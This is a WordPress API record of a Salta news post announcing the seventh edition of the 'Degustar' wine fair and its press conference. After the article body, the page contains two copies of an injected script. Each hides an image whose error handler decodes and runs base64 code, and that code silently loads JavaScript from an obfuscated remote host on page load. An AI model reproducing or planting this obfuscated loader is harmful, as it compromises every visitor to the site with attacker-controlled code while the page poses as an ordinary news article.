{"id":5383,"date":"2025-07-30T11:44:24","date_gmt":"2025-07-30T14:44:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5383"},"modified":"2025-08-13T23:21:00","modified_gmt":"2025-08-14T02:21:00","slug":"se-presentara-una-nueva-edicion-de-la-feria-de-vinos-degustar","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5383","title":{"rendered":"Se presentar\u00e1 una nueva edici\u00f3n de la feria de vinos \u201cDegustar\u201d"},"content":{"rendered":"\n<p><strong><em>El Ministerio de Turismo y Deportes acompa\u00f1a una nueva edici\u00f3n de Degustar, evento que promueve el desarrollo del sector vitivin\u00edcola y gastron\u00f3mico de la provincia. La conferencia de prensa ser\u00e1 este mi\u00e9rcoles 30 de julio a las 12 en el Hotel Dazzler.<\/em><\/strong><\/p>\n\n\n\n<p>Degustar, la feria de vinos con mayor trayectoria en Salta, celebrar\u00e1 su 7ma edici\u00f3n y los detalles se brindar\u00e1n este mi\u00e9rcoles 30 de julio en una conferencia de prensa que se desarrollar\u00e1 a partir de las 12 en el Hotel Dazzler, ubicado en Zuviria 631.<\/p>\n\n\n\n<p>Durante la presentaci\u00f3n se dar\u00e1n a conocer todas las novedades de la edici\u00f3n 2025, incluyendo las bodegas participantes, experiencias, espacios tem\u00e1ticos, actividades y el impacto econ\u00f3mico y tur\u00edstico que genera a\u00f1o tras a\u00f1o en la regi\u00f3n.<\/p>\n\n\n\n<p>La 7ma edici\u00f3n de Degustar se realizar\u00e1 los d\u00edas jueves 21 y viernes 22 de agosto en el Club 20 de Febrero, consolid\u00e1ndose como una propuesta destacada dentro del calendario enotur\u00edstico del norte argentino.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes acompa\u00f1a una nueva edici\u00f3n de Degustar, evento que promueve el desarrollo del sector vitivin\u00edcola y gastron\u00f3mico de la provincia. La conferencia de prensa ser\u00e1 este mi\u00e9rcoles 30 de julio a las 12 en el Hotel Dazzler. Degustar, la feria de vinos con mayor trayectoria en Salta, celebrar\u00e1 su 7ma [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5384,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,20],"tags":[],"class_list":{"0":"post-5383","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-empresas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5383"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5383"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5383\/revisions"}],"predecessor-version":[{"id":6426,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5383\/revisions\/6426"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5384"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5383"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5383"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5383"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}